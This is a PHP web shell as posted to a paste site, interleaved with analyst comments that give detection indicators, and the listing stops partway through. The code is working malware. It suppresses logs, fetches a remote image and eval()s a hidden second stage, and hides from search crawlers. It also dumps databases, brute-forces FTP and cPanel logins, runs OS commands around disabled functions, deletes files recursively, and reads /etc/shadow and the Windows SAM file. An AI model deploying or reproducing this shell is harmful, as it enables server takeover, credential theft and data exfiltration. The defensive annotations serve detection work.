1Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
2<?php
// ANALYST NOTE: this listing is a PHP web shell as posted to a paste site. The digits fused to the
// start of each line are the paste site's gutter numbers, not part of the script itself.
3// Set Username & Password
// Hard-coded operator credentials. In the code visible here only $pass is read: its MD5 is compared
// against the `hacked` cookie further down, so the expected cookie value is a fixed string.
4$user = "cox";
5$pass = "cox";
6
// Hard-coded external host, labelled "Malware Site" by the author. It is not referenced again in the
// part of the listing visible here; treat it as an indicator to search for in proxy/DNS logs.
7$malsite = "http://fightagent.ru"; // Malware Site
8
// Base64 text for the defacement page; mainfun() checks strlen($ind) before showing its "Deface IT" link.
9$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
10
// Anti-forensics / hardening bypass: error logging and error reporting are switched off and the
// execution time limit is removed, so failures in this script leave no entries in the PHP error log.
// Every call is @-suppressed so the script keeps running where a setting cannot be changed.
11@set_magic_quotes_runtime(0);
12@ini_set('error_log',NULL);
13@ini_set('log_errors',0);
14ob_start();
15error_reporting(0);
16@set_time_limit(0);
17@ini_set('max_execution_time',0);
18@ini_set('output_buffering',0);
// Second-stage loader: EXIF metadata is read from a remotely hosted JPEG and the Base64-decoded
// UserComment field is passed to eval(). The evaluated code is therefore not present in this file,
// so a static scan of the file alone does not show what actually runs. This executes at top level,
// before the crawler check and before the cookie check below.
// Detection: exif_read_data() called with a URL followed by eval(base64_decode(...)); outbound HTTPS
// from the PHP worker to an image host on requests for a single script.
// NOTE(review): reading a URL here presumably depends on URL stream wrappers being enabled
// (allow_url_fopen) - confirm against the target PHP configuration.
19$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
20eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
// Crawler cloaking: when the User-Agent contains one of the listed search-engine bot names
// (case-insensitive) the script answers 404 and exits, which keeps the shell out of search indexes.
// Detection: the same URL returning 404 for a crawler User-Agent and a normal response otherwise.
21if(!empty($_SERVER['HTTP_USER_AGENT']))
22{
23 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
24 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
25 header('HTTP/1.0 404 Not Found');
26 exit; }
27}
28// Dump Database
// ANALYST NOTE: full database export to a downloadable .sql file.
// This branch sits before the `hacked` cookie check that appears later in the listing, so as shown
// it only requires ?action=dumpDB plus a `dbserver` cookie, not the shell password.
// Inputs: connection host/user/password come from cookies, the database name from the query string;
// none of them are validated before use in the file name or the SQL text.
29if($_GET["action"] == "dumpDB")
30{
31 $self=$_SERVER["PHP_SELF"];
32 if(isset($_COOKIE['dbserver']))
33 {
34 $date = date("Y-m-d");
35 $dbserver = $_COOKIE["dbserver"];
36 $dbuser = $_COOKIE["dbuser"];
37 $dbpass = $_COOKIE["dbpass"];
38 $dbname = $_GET['dbname'];
39 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
40
41 $file = "Dump-$dbname-$date";
42
// Forensic artifact: the dump is written to a file named Dump-<dbname>-<YYYY-MM-DD>.sql, opened by
// relative path. Nothing in this block deletes it afterwards, so leftover Dump-*.sql files next to
// web content are worth searching for during incident response.
43 $file="Dump-$dbname-$date.sql";
44 $fp = fopen($file,"w");
45
// Helper declared inside the branch; appends $data to the dump file through the global handle $fp.
46 function write($data)
47 {
48 global $fp;
49
50 fwrite($fp,$data);
51
52 }
// Uses the legacy mysql_* extension. For every table: write its CREATE TABLE statement, then one
// INSERT per row with each value quoted via mysql_escape_string().
53 mysql_connect ($dbserver, $dbuser, $dbpass);
54 mysql_select_db($dbname);
55 $tables = mysql_query ("SHOW TABLES");
56 while ($i = mysql_fetch_array($tables))
57 {
58 $i = $i['Tables_in_'.$dbname];
59 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
60 write($create['Create Table'].";");
61 $sql = mysql_query ("SELECT * FROM ".$i);
62 if (mysql_num_rows($sql)) {
63 while ($row = mysql_fetch_row($sql)) {
64 foreach ($row as $j => $k) {
65 $row[$j] = "'".mysql_escape_string($k)."'";
66 }
67 write("INSERT INTO $i VALUES(".implode(",", $row).");");
68 }
69 }
70 }
71
72 fclose ($fp);
73
// The finished file is sent back as an attachment in 64 KiB chunks. Detection: a large response
// with Content-Type application/download and a Dump-*.sql attachment name from a PHP script.
74 header("Content-Disposition: attachment; filename=" . $file);
75 header("Content-Type: application/download");
76 header("Content-Length: " . filesize($file));
77 flush();
78
79 $fp = fopen($file, "r");
80 while (!feof($fp))
81 {
82 echo fread($fp, 65536);
83 flush();
84 }
85 fclose($fp);
86 }
87}
88function shellstyle()
89{
90 echo "<style type=\"text/css\">
91<!--
92
93body,td,th {
94 color: #FF0000;
95 font-size: 14px;
96}
97input.but {
98 background-color:#000000;
99 color:#FF0000;
100 border : 1px solid #1B1B1B;
101}
102a:link {
103 color: #00FF00;
104 text-decoration:none;
105 font-weight:500;
106}
107a:hover {
108 color:#00FF00;
109 text-decoration:underline;
110}
111font.txt
112{
113 color: #00FF00;
114 text-decoration:none;
115 font-size:14px;
116}
117font.mainmenu
118{
119 color:#FF0000;
120 text-decoration:none;
121 font-size:14px;
122}
123a:visited {
124 color: #006600;
125}
126input.box
127{
128 background-color:#0C0C0C;
129 color: lime;
130 border : 1px solid #1B1B1B;
131 -moz-border-radius:6px;
132 width:400;
133 border-radius:6px;
134}
135input.sbox
136{
137 background-color:#0C0C0C;
138 color: lime;
139 border : 1px solid #1B1B1B;
140 -moz-border-radius:6px;
141 width:180;
142 border-radius:6px;
143}
144select.sbox
145{
146 background-color:#0C0C0C;
147 color: lime;
148 border : 1px solid #1B1B1B;
149 -moz-border-radius:6px;
150 width:180;
151 border-radius:6px;
152}
153select.box
154{
155 background-color:#0C0C0C;
156 color: lime;
157 border : 1px solid #1B1B1B;
158 -moz-border-radius:6px;
159 width:400;
160 border-radius:6px;
161}
162
163textarea.box
164{
165 border : 3px solid #111;
166 background-color:#161616;
167 color : lime;
168 margin-top: 10px;
169 -moz-border-radius:7px;
170 border-radius:7px;
171}
172body {
173 background-color:#000000;
174}
175.myphp table
176{
177 width:100%;
178 padding:18px 10px;
179 border : 1px solid #1B1B1B;
180}
181.myphp td
182{
183 background:#111111;
184 color:#00ff00;
185 padding:6px 8px;
186 border-bottom:1px solid #222222;
187 font-size:14px;
188}
189.myphp th, th
190{
191 background:#181818;
192
193}
194-->
195</style>";
196}
// ANALYST NOTE: authentication gate for the shell's main functionality. Access is granted when the
// `hacked` cookie equals md5($pass), compared with the loose `==` operator. Because $pass is
// hard-coded, the accepted cookie value is a constant: a `hacked=<32 hex chars>` cookie sent to a
// PHP script is a usable indicator in web-server or proxy logs that record cookies.
// The opening brace of this branch is not closed within this span.
197if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
198{
199 $self=$_SERVER["PHP_SELF"];
200 $os = "N/D";
201 $bdmessage = null;
// Starting directory for the file browser is the script's current working directory.
202 $dir = getcwd();
203
// Platform detection from php_uname(); selects the path separator used when building file paths.
// $os stays "N/D" and $directorysperator stays unset when neither string matches.
204 if(stristr(php_uname(),"Windows"))
205 {
206 $SEPARATOR = '\\';
207 $os = "Windows";
208 $directorysperator="\\";
209 }
210 else if(stristr(php_uname(),"Linux"))
211 {
212 $os = "Linux";
213 $directorysperator='/';
214 }
// Splits path $d on the separator $directsperator, drops the last two segments and joins the
// remainder back into a string. mainfun() calls it to build the target of the ".." row.
215 function Trail($d,$directsperator)
216 {
217 $d=explode($directsperator,$d);
218 array_pop($d);
219 array_pop($d);
220 $str=implode($d,$directsperator);
221 return $str;
222 }
223
// ANALYST NOTE: credential-guessing helper. Tries one username/password pair against an FTP service
// on $host through cURL and prints a "Cracking Success" banner when cURL reports no error.
// $timeout is the connect timeout passed to cURL.
// Detection: the web-server account opening outbound FTP connections, and runs of failed FTP
// logins on the target host that originate from a web server's address.
224 function ftp_check($host,$user,$pass,$timeout)
225 {
226 $ch = curl_init();
227 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
228 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
229 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
230 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
231 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
232 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
233 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
234 $data = curl_exec($ch);
// cURL error 28 is treated as a timeout: the script prints an error and terminates the request.
// Error 0 is reported as a valid credential pair; any other error prints nothing.
235 if ( curl_errno($ch) == 28 )
236 {
237 print "<center><b>
238 Error : Connection Timeout.
239 Please Check The Target Hostname .</b></center>";exit;
240 }
241 else if ( curl_errno($ch) == 0 )
242 {
243 print "<center><b>[~]</b><font class=txt>
244 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
245 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
246 }
247 curl_close($ch);
248 }
249
// ANALYST NOTE: credential-guessing helper for an HTTP Basic-protected control panel. Sends one
// username/password pair to http://$host:<port>, where the port is read from the global
// $cpanel_port, and prints a "Cracking Success" banner when cURL reports no error
// (CURLOPT_FAILONERROR is set, so HTTP error statuses count as failures).
// Detection: repeated HTTP Basic authentication failures against a hosting panel port coming from
// a web server's address.
250 function cpanel_check($host,$user,$pass,$timeout)
251 {
252 global $cpanel_port;
253 $ch = curl_init();
254 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
255 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
256 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
257 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
258 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
259 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
260 $data = curl_exec($ch);
// cURL error 28 (timeout) ends the request with an error message; error 0 is reported as success.
261 if ( curl_errno($ch) == 28 )
262 { print "<center><b>Error : Connection Timeout.
263 Please Check The Target Hostname.</b></center>";exit;}
264 else if ( curl_errno($ch) == 0 ){
265 print "<ecnter><b>[~]</b><font class=txt><b>
266
267 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
268 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
269 }
270 curl_close($ch);
271 }
272
273 // Database functions
274 function listdatabase()
275 {
276 $self=$_SERVER["PHP_SELF"];
277 ?>
278 <br>
279 <form>
280 <table>
281 <tr>
282 <td><input type="text" class="box" name="dbname"></td>
283 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
284 </tr>
285 </table>
286 </form>
287 <br>
288 <?php
289 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
290 $result = mysql_query("SHOW DATABASE");
291 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
292
293 $pDB = mysql_list_dbs( $mysqlHandle );
294 $num = mysql_num_rows( $pDB );
295 for( $i = 0; $i < $num; $i++ )
296 {
297 $dbname = mysql_dbname( $pDB, $i );
298 mysql_select_db($dbname,$mysqlHandle);
299 $result = mysql_query("SHOW TABLES");
300 $num_of_tables = mysql_num_rows($result);
301 echo "<tr>\n";
302 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
303 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
304 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
305 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
306 echo "</tr>\n";
307 }
308 echo "</table>\n";
309 mysql_close($mysqlHandle);
310 }
311
312 function listtable()
313 {
314 $self=$_SERVER["PHP_SELF"];
315 $dbserver = $_COOKIE["dbserver"];
316 $dbuser = $_COOKIE["dbuser"];
317 $dbpass = $_COOKIE["dbpass"];
318 $dbname = $_GET['dbname'];
319 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
320 ?>
321 <br><br>
322 <form>
323 <table>
324
325 <tr>
326 <td><input type="text" class="box" name="tablename"></td>
327 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
328 </tr>
329 </table>
330
331 <br>
332 <form>
333 <table>
334 <tr>
335 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
336 </tr>
337 <tr>
338 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
339 </tr>
340 </table>
341 </form>
342
343 <?php
344
345 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
346
347 mysql_select_db($dbname);
348 $pTable = mysql_list_tables( $dbname );
349
350 if( $pTable == 0 ) {
351 $msg = mysql_error();
352 echo "<h3>Error : $msg</h3><p>\n";
353 return;
354 }
355 $num = mysql_num_rows( $pTable );
356
357 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
358
359 for( $i = 0; $i < $num; $i++ )
360 {
361 $tablename = mysql_tablename( $pTable, $i );
362 $result = mysql_query("select * from $tablename");
363 $num_rows = mysql_num_rows($result);
364 echo "<tr>\n";
365 echo "<td>\n";
366 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
367 echo "</td>\n";
368 echo "<td>\n";
369 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
370 echo "</td>\n";
371 echo "<td>\n";
372 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
373 echo "</td>\n";
374 echo "<td>\n";
375 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
376 echo "</td>\n";
377 echo "<td>\n";
378 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
379 echo "</td>\n";
380 echo "</tr>\n";
381 }
382
383 echo "</table></form>";
384 mysql_close($mysqlHandle);
385 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
386 }
387
388
// Prints a "label: value" line. Nothing is printed when the trimmed value is empty; a value that
// contains a newline is wrapped in <pre>. Both $n and $v are echoed without HTML escaping.
389 function paramexe($n, $v)
390 {
391 $v = trim($v);
392 if($v)
393 {
394 echo '<span><font size=3>' . $n . ': </font></span>';
395 if(strpos($v, "\n") === false)
396 echo '<font size=2>' . $v . '</font><br>';
397 else
398 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
399 }
400 }
401
402
403
// ANALYST NOTE: recursive delete. Removes every file and sub-directory below $dir and then $dir
// itself; does nothing when $dir is not a directory. Return values of unlink()/rmdir() are not
// checked. Detection: file-integrity monitoring reporting bulk deletions performed by the
// web-server account.
404 function rrmdir($dir)
405 {
406 if (is_dir($dir)) // ensures that we actually have a directory
407 {
408 $objects = scandir($dir); // gets all files and folders inside
409 foreach ($objects as $object)
410 {
411 if ($object != '.' && $object != '..')
412 {
413 if (is_dir($dir . '/' . $object))
414 {
415 // if we find a directory, do a recursive call
416 rrmdir($dir . '/' . $object);
417 }
418 else
419 {
420 // if we find a file, simply delete it
421 unlink($dir . '/' . $object);
422 }
423 }
424 }
425 // the original directory is now empty, so delete it
426 rmdir($dir);
427 }
428 }
429
// Runs the system `which` command for program name $pr through execmd() and returns the trimmed
// result, or the trimmed name itself when execmd() returns an empty value. $pr is interpolated
// into the command line as-is.
430 function which($pr)
431 {
432 $path = execmd("which $pr");
433 if(!empty($path))
434 return trim($path);
435 else
436 return trim($pr);
437 }
438
// Returns $text with slashes stripped when magic_quotes_gpc is enabled, otherwise unchanged, so
// request values are used the same way under either setting.
439 function magicboom($text)
440 {
441 if (!get_magic_quotes_gpc())
442 return $text;
443 return stripslashes($text);
444 }
445
// ANALYST NOTE: operating-system command execution with fallback across PHP's process functions.
// $cmd         - command line handed to the shell unchanged.
// $d_functions - comma-separated list in the format of the disable_functions ini value; the default
//                "None" means nothing is disabled and passthru() is called directly.
// Returns the value produced by the function that was used, or -1 when no candidate is usable or a
// pipe could not be opened.
// Hardening: the code below walks shell_exec, exec, passthru, system, popen and proc_open in that
// order and uses the first one not named in $d_functions, so disabling only some of the six leaves
// a working path. Detection: shell child processes spawned by the PHP/web-server worker.
446function execmd($cmd,$d_functions="None")
447{
448 if($d_functions=="None")
449 {
450 $ret=passthru($cmd);
451 return $ret;
452 }
453 $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
// Spaces are removed so that "a, b" and "a,b" produce the same list of disabled names.
454 $d_functions=str_replace(" ","",$d_functions);
455 $dis_funcs=explode(",",$d_functions);
456 foreach($funcs as $safe)
457 {
458 if(!in_array($safe,$dis_funcs))
459 {
// All calls are @-suppressed so a failure produces no warning in the output or the logs.
460 if($safe=="exec")
461 {
462 $ret=@exec($cmd);
463 $ret=join("\n",$ret);
464 return $ret;
465 }
466 elseif($safe=="system")
467 {
468 $ret=@system($cmd);
469 return $ret;
470 }
471 elseif($safe=="passthru")
472 {
473 $ret=@passthru($cmd);
474 return $ret;
475 }
476 elseif($safe=="shell_exec")
477 {
478 $ret=@shell_exec($cmd);
479 return $ret;
480 }
481 elseif($safe=="popen")
482 {
483 $ret=@popen("$cmd",'r');
484 if(is_resource($ret))
485 {
486 while(@!feof($ret))
487 $read.=@fgets($ret);
488 @pclose($ret);
489 return $read;
490 }
491 return -1;
492 }
493 elseif($safe="proc_open")
494 {
495 $cmdpipe=array(
496 0=>array('pipe','r'),
497 1=>array('pipe','w')
498 );
499 $resource=@proc_open($cmd,$cmdpipe,$pipes);
500 if(@is_resource($resource))
501 {
502 while(@!feof($pipes[1]))
503 $ret.=@fgets($pipes[1]);
504 @fclose($pipes[1]);
505 @proc_close($resource);
506 return $ret;
507 }
508 return -1;
509 }
510 }
511 }
512 return -1;
513}
514
// Returns the disable_functions ini value, or the string "None" when it is empty. "None" is the
// same sentinel execmd() uses as its default for "nothing disabled".
515 function getDisabledFunctions()
516 {
517 if(!ini_get('disable_functions'))
518 {
519 return "None";
520 }
521 else
522 {
523 return @ini_get('disable_functions');
524 }
525 }
526
/**
 * Render a file's mode as an `ls -l` style string such as "-rw-r--r--".
 *
 * The first character is the file type (s, l, -, b, d, c, p, or u when no type mask matches);
 * the remaining nine are the owner, group and world triads, with setuid/setgid shown as s/S and
 * the sticky bit as t/T in the execute position.
 *
 * @param string $file Path passed to fileperms().
 * @return string Ten-character permission string.
 */
function getFilePermissions($file)
{
    $mode = fileperms($file);

    // Type masks are tested in this order and the first full match wins.
    $typeMasks = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );

    $rendered = 'u'; // unknown type unless a mask matches
    foreach ($typeMasks as $mask => $letter) {
        if (($mode & $mask) == $mask) {
            $rendered = $letter;
            break;
        }
    }

    // One row per triad: read bit, write bit, execute bit, special bit, and the letters shown
    // when the special bit is set with / without the execute bit.
    $triads = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner + setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group + setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world + sticky
    );

    foreach ($triads as $bits) {
        $rendered .= ($mode & $bits[0]) ? 'r' : '-';
        $rendered .= ($mode & $bits[1]) ? 'w' : '-';

        $hasSpecial = (bool) ($mode & $bits[3]);
        if ($mode & $bits[2]) {
            $rendered .= $hasSpecial ? $bits[4] : 'x';
        } else {
            $rendered .= $hasSpecial ? $bits[5] : '-';
        }
    }

    return $rendered;
}
// Wraps the permission string from getFilePermissions() in a colour: red when the path is not
// readable by the PHP process, white when readable but not writable, green when writable.
// In effect it highlights which files the web-server account is able to modify.
580 function filepermscolor($filename)
581 {
582 if(!@is_readable($filename))
583 return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
584 else if(!@is_writable($filename))
585 return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
586 else
587 return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
588 }
589
590 function yourip()
591 {
592 echo $_SERVER["REMOTE_ADDR"];
593 }
594 function phpver()
595 {
596 $pv=@phpversion();
597 echo $pv;
598 }
599 function magic_quote()
600 {
601 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
602 }
603 function serverip()
604 {
605 echo getenv('SERVER_ADDR');
606 }
607 function serverport()
608 {
609 echo $_SERVER['SERVER_PORT'];
610 }
611 function safe()
612 {
613 global $sm;
614 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
615 }
616 function serveradmin()
617 {
618 echo $_SERVER['SERVER_ADMIN'];
619 }
620 function systeminfo()
621 {
622 echo php_uname();
623 }
624 function curlinfo()
625 {
626 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
627 }
628 function oracleinfo()
629 {
630 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
631 }
632 function mysqlinfo()
633 {
634 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
635 }
636 function mssqlinfo()
637 {
638 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
639 }
640 function postgresqlinfo()
641 {
642 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
643 }
644 function softwareinfo()
645 {
646 echo getenv("SERVER_SOFTWARE");
647 }
// ANALYST NOTE: file exfiltration endpoint. Takes the `download` query parameter, keeps only the
// text after its last "/" (the loop overwrites $nfd with each segment in turn), sends that name as
// an attachment and ends the request. The file is opened by that bare name, i.e. relative to the
// script's working directory.
// Detection: responses with Content-type application/octet-stream from a PHP script for requests
// that carry a `download=` parameter.
648 function download()
649 {
650 $frd=$_GET['download'];
651 $prd=explode("/",$frd);
652 for($i=0;$i<sizeof($prd);$i++)
653 {
654 $nfd=$prd[$i];
655 }
// Discards any output buffered so far so that only the file bytes are sent.
656 @ob_clean();
657 header("Content-type: application/octet-stream");
658 header("Content-length: ".filesize($nfd));
659 header("Content-disposition: attachment; filename=\"".$nfd."\";");
660 readfile($nfd);
661
662 exit;
663
664 }
665
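/**
 * Format a byte count with a binary unit suffix, rounded to two decimals.
 *
 * Values are divided by 1024 until they drop below 1024 or the largest known unit (PB) is
 * reached, so exactly 1024 bytes is shown as "1 KB" and very large values stay in PB instead of
 * indexing past the end of the unit table.
 *
 * @param int|float $size Size in bytes.
 * @return string For example "1.5 KB".
 */
function HumanReadableFilesize($size)
{
    $mod = 1024;
    $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB');
    $lastUnit = count($units) - 1;

    $i = 0;
    // ">=" so that an exact multiple moves to the next unit; the index bound keeps $units[$i] valid.
    while ($size >= $mod && $i < $lastUnit) {
        $size /= $mod;
        $i++;
    }

    return round($size, 2) . ' ' . $units[$i];
}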
676
677 function showDrives()
678 {
679 global $self;
680 foreach(range('A','Z') as $drive)
681 {
682 if(is_dir($drive.':\\'))
683 {
684 $myd = $drive.":\\";
685 ?>
686 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
687 <?php echo $myd; ?>
688 </a>
689 <?php
690 }
691 }
692 }
693 function diskSpace()
694 {
695 return disk_total_space("/");
696 }
697 function freeSpace()
698 {
699 return disk_free_space("/");
700 }
701
// Runs the system `which` command for $p through myexe() and returns its output, or false when the
// output is empty. mysecinfo() uses it to test which programs are installed on the host.
702 function thiscmd($p)
703 {
704 $path = myexe('which ' . $p);
705 if(!empty($path))
706 return $path;
707 return false;
708 }
709
// ANALYST NOTE: host reconnaissance report. Prints server software, PHP restrictions, available
// database extensions and, depending on $GLOBALS['os'], Linux or Windows system details gathered
// through myexe() and direct file reads.
// Detection: one web request causing the web-server account to spawn many short-lived `which`,
// `whereis`, `cat`, `df`, `free` (Linux) or `ver`, `net accounts`, `net user` (Windows) processes.
710 function mysecinfo()
711 {
// Output helper declared inside mysecinfo(): prints "label: value" and skips empty values.
// Neither argument is HTML-escaped.
712 function myparam($n, $v)
713 {
714 $v = trim($v);
715 if($v)
716 {
717 echo '<span><font color =red size=3>' . $n . ': </font></span>';
718 if(strpos($v, "\n") === false)
719 echo '<font color =lime size=3>' . $v . '</font><br>';
720 else
721 echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
722 }
723 }
724
// PHP / web-server level facts: restrictions in force (open_basedir, safe-mode directories) and
// which database client extensions are compiled in.
725 myparam('Server software', @getenv('SERVER_SOFTWARE'));
726 if(function_exists('apache_get_modules'))
727 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
728 myparam('Open base dir', @ini_get('open_basedir'));
729 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
730 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
731 $temp=array();
732 if(function_exists('mysql_get_client_info'))
733 $temp[] = "MySql (".mysql_get_client_info().")";
734 if(function_exists('mssql_connect'))
735 $temp[] = "MSSQL";
736 if(function_exists('pg_connect'))
737 $temp[] = "PostgreSQL";
738 if(function_exists('oci_connect'))
739 $temp[] = "Oracle";
740 myparam('Supported databases', implode(', ', $temp));
741 echo '<br>';
742
// Linux branch: distribution and kernel, whether /etc/passwd and /etc/shadow are readable by the
// PHP process (with links to view them), interpreter/compiler locations, CPU, memory, fstab, limits.
743 if($GLOBALS['os'] == 'Linux') {
744 myparam('Distro : ', myexe("cat /etc/*-release"));
745 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
746 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
747 myparam('OS version', @file_get_contents('/proc/version'));
748 myparam('Distr name', @file_get_contents('/etc/issue.net'));
749 myparam('Where is Perl?', myexe('whereis perl'));
750 myparam('Where is Python?', myexe('whereis python'));
751 myparam('Where is gcc?', myexe('whereis gcc'));
752 myparam('Where is apache?', myexe('whereis apache'));
753 myparam('CPU?', myexe('cat /proc/cpuinfo'));
754 myparam('RAM', myexe('free -m'));
755 myparam('Mount options', myexe('cat /etc/fstab'));
756 myparam('User Limits', myexe('ulimit -a'));
757
758
// Tool inventory, one `which` lookup per name. $userful holds compilers/interpreters/archivers,
// $downloaders holds fetch utilities, and $danger is the author's list of security products
// (antivirus, rootkit checkers, firewalls, IDS, integrity and log monitors): the report tells the
// operator which defensive tooling is installed on the host.
759 if(!$GLOBALS['safe_mode']) {
760 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
761 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
762 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
763 echo '<br>';
764 $temp=array();
765 foreach ($userful as $item)
766 if(thiscmd($item))
767 $temp[] = $item;
768 myparam('Userful', implode(', ',$temp));
769 $temp=array();
770 foreach ($danger as $item)
771 if(thiscmd($item))
772 $temp[] = $item;
773 myparam('Danger', implode(', ',$temp));
774 $temp=array();
775 foreach ($downloaders as $item)
776 if(thiscmd($item))
777 $temp[] = $item;
778 myparam('Downloaders', implode(', ',$temp));
779 echo '<br/>';
780 myparam('HDD space', myexe('df -h'));
781 myparam('Hosts', @file_get_contents('/etc/hosts'));
782
783 }
// Any other value of $GLOBALS['os'] takes the Windows branch: a download link for the SAM backup
// under %WINDIR%\repair, links to open the hosts / networks / lmhosts.sam files, and the output of
// `ver`, `net accounts` and `net user`.
784 } else {
785 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
786 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
787 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
788 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
789 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
